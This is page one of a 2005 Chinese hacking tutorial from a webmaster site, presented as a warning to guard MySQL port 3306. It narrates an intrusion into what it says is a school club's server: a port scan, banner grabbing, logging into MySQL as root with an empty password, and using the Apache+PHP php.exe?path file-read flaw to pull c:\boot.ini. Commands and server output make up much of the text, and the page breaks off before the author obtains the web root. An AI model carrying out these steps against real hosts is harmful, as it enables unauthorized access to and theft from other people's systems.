看紧你的3306端口，一次通过mysql的入侵 --个人站长站学堂

推荐位

看紧你的3306端口，一次通过mysql的入侵

中国个人站长站 MySQL教程点击数：更新时间：2005-3-13 17:15:01

用superscan扫了一下
某个c类的网段，寻找开放80端口的机器，结果就只有一台机器
开放了80端口，试着连了一下，是我们学校某个社团的的主页。
从端口的banner来看应该是apache（win32）,证实一下
telnet 211.87.xxx.xxx
get（回车）
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>501 Method
Not Implemented</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
get to /index
.html not supported.<P>
Invalid method in request get<P>
<HR>
<ADDRESS>Apache/1.3.2
2 Server at www.xxxxxx.com Port 80</ADDRESS>
</BODY></HTML>

遗失对主机的连接。
C:\>
呵呵，这下看得更清楚了

据我猜测，应该是"apache+mysql+php"的黄金组合吧
习惯性的mysql -h 211.87.xxx.xxx
果然连上了
Welcome to the MySQL monitor. Commands end with or \g.
Your MySQL connection id is 17 to server version: 3.23.53-max-nt

Type help; or \h for help. Type \c to clear the buffer.

mysql>

断开试着
mysql -h 211.87.xxx.xxx -u root -p
password:
Welcome to the MySQL monitor. Commands end with or \g.
Your MySQL connection id is 18 to server version: 3.23.53-max-nt

Type help; or \h for help. Type \c to clear the buffer.

mysql>
呵呵，大家看到了他的root用户没有密码，这是我今天要说的第一个主题。
这是相当的危险的，碰见这种情况，有99.999%的可能可以进入
既然使用的apache+php，只要找到他在本地存放的web的物理路径就为所欲为了
呵呵
下一个问题是我今天要说的重点怎么样才能知道那台主机的存放的web的物理路径？
方法有很多种，在这里我介绍2种方法供初学者参考
首先要告诉大家的是低版本的apache+php有一个漏洞
提http://xxx.xxxx.xxx.xxx/php/php.exe?对方的物理文件名
就可以把那个物理文件下载下来。

于是提http://211.87.xxx.xxx/php/php.exe?c:\a.txt
返回
No input file specified. （没有这个漏洞的话提示找不到网页）
好的，这说明他有这个漏洞。
在提http://211.87.xxx.xxx/php/php.exe?c:\boot.ini
返回
[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating

systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional"

/fastdetect
呵呵，装的还是xp。
好了，我们可以猜测对

[1] [2] [3] 下一页

SQL爱好者网友投稿文章录入：swh 责任编辑：swh

上一篇文章： MYSQL用户root密码为弱口令的攻击
下一篇文章： MySQL 如何对抗解密高手